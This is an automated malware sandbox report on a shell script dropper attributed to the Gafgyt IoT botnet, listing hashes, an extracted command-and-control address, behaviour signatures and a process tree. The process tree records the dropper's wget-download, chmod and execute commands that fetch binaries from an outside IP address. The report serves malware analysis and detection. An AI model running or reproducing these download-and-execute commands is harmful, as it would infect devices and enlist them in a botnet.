Analysis
-
max time kernel
37s -
max time network
41s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
arch:armhfimage:debian9-armhf-20240611-enkernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem -
submitted
28-09-2024 07:55
Static task
static1
Behavioral task
behavioral1
Sample
sex.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
sex.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
sex.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
sex.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral5
Sample
sex.sh
Resource
debian9-mipsel-20240729-en
Behavioral task
behavioral6
Sample
sex.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
sex.sh
Resource
ubuntu2004-amd64-20240508-en
Behavioral task
behavioral8
Sample
sex.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
sex.sh
Resource
ubuntu2404-amd64-20240729-en
General
-
Target
sex.sh
-
Size
1KB
-
MD5
884dc57dd0892038d53a2d4b017504df
-
SHA1
52ab9780591ee9718ce6188a9edafc1afa05dcdf
-
SHA256
d347e32185478f56ce1c96e1e5dc3ad80ffdcf623036ca6750c60c6183a5c779
-
SHA512
25e1afb67512005fecdf47712dfc1f0c74ecb221ed0f3904ff47f3ef30948334e31426003f6590c580024f758c7ab8576412a280b5f5ce3f787b6208037db3ca
Malware Config
Extracted
gafgyt
205.185.127.244:23
Signatures
-
Detected Gafgyt variant 4 IoCs
resource yara_rule behavioral3/files/fstream-1.dat family_gafgyt behavioral3/files/fstream-2.dat family_gafgyt behavioral3/files/fstream-3.dat family_gafgyt behavioral3/files/fstream-4.dat family_gafgyt -
File and Directory Permissions Modification 1 TTPs 4 IoCs
Adversaries may modify file or directory permissions to evade defenses.
pid Process 751 chmod 762 chmod 767 chmod 772 chmod -
Executes dropped EXE 4 IoCs
ioc pid Process /tmp/mips 752 mips /tmp/mipsel 763 mipsel /tmp/sh4 768 sh4 /tmp/x86 773 x86 -
System Network Configuration Discovery 1 TTPs 6 IoCs
Adversaries may gather information about the network configuration of a system.
pid Process 651 wget 752 mips 758 rm 759 wget 763 mipsel 765 rm -
Writes file to tmp directory 4 IoCs
Malware often drops required files in the /tmp directory.
description ioc Process File opened for modification /tmp/mips wget File opened for modification /tmp/mipsel wget File opened for modification /tmp/sh4 wget File opened for modification /tmp/x86 wget
Processes
-
/tmp/sex.sh/tmp/sex.sh1⤵PID:644
-
/usr/bin/wgetwget http://205.185.127.244/mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:651
-
-
/bin/chmodchmod +x mips2⤵
- File and Directory Permissions Modification
PID:751
-
-
/tmp/mips./mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:752
-
-
/bin/rmrm -rf mips2⤵
- System Network Configuration Discovery
PID:758
-
-
/usr/bin/wgetwget http://205.185.127.244/mipsel2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:759
-
-
/bin/chmodchmod +x mipsel2⤵
- File and Directory Permissions Modification
PID:762
-
-
/tmp/mipsel./mipsel2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:763
-
-
/bin/rmrm -rf mipsel2⤵
- System Network Configuration Discovery
PID:765
-
-
/usr/bin/wgetwget http://205.185.127.244/sh42⤵
- Writes file to tmp directory
PID:766
-
-
/bin/chmodchmod +x sh42⤵
- File and Directory Permissions Modification
PID:767
-
-
/tmp/sh4./sh42⤵
- Executes dropped EXE
PID:768
-
-
/bin/rmrm -rf sh42⤵PID:770
-
-
/usr/bin/wgetwget http://205.185.127.244/x862⤵
- Writes file to tmp directory
PID:771
-
-
/bin/chmodchmod +x x862⤵
- File and Directory Permissions Modification
PID:772
-
-
/tmp/x86./x862⤵
- Executes dropped EXE
PID:773
-
-
/bin/rmrm -rf x862⤵PID:775
-
-
/usr/bin/wgetwget http://205.185.127.244/arm612⤵PID:776
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
176KB
MD524e07a16008a42f0a8dceb166b4b44cd
SHA187f80fc2998304bc8735479faa75f509a6d5db13
SHA256c4d4bfc3fa6e216baccce64fe187d70519f11aa8ad33573cfdf1c416bbd0ad6f
SHA512b75a61fc9584e124dbc98556e30166e379dc01ce64312a48906d8e4aed406127aeea1da5f8183e10fe0468908863f7467ac58e71f482c119300836c7c419dab5
-
Filesize
176KB
MD5ac28a3dfa3ed9b815a8021a362b06607
SHA193455b3775f586e230d8879489f9a6062de70677
SHA2563d9924dddeca5e712bd22e28453437b61eb95c5319e7535737a0bd7a128f30a5
SHA51294c3aae6a3e945aac0beff504c76f454a5f2b78b88d4cd2364cb0f5608dc25183d37bf0338d4fc2966616e95cbe7ef03f34dfb910dd688ae536d9f5a66f1516e
-
Filesize
123KB
MD55ec3c0e18b6fbc6e37bd611e2df8f9a4
SHA1de10e2b7ce11ffa0bc0fcca82a489a3e6efc160d
SHA2569b1ca4aa272007f3ae1a80932a690cd1749ab6f8f7980de0f2e5cd326573c4c6
SHA51276f484543e43cfb33ff449439a64ae08578a7c8142393eed0219f642d7e9401ecf7efe093765be45f1c767d970cc0d280ba53264eb2a6eb7771a7055765e8b20
-
Filesize
127KB
MD5678363120cd2661f040670b90f211243
SHA157d75e1c42243d08eb78623e6cdc6b066994a7ee
SHA256cd39c6c637c039bcedc5b906e8c0e602f73c841947b429efc88ec4511d95a36a
SHA5125a2b440135caa5656deb70f7d6274f8bc570e31c6aac4b6aac8375962db512b885afc6223a9767fc0ff7f29dc5377efa441277cb356dba1e3b5716a57f38ca55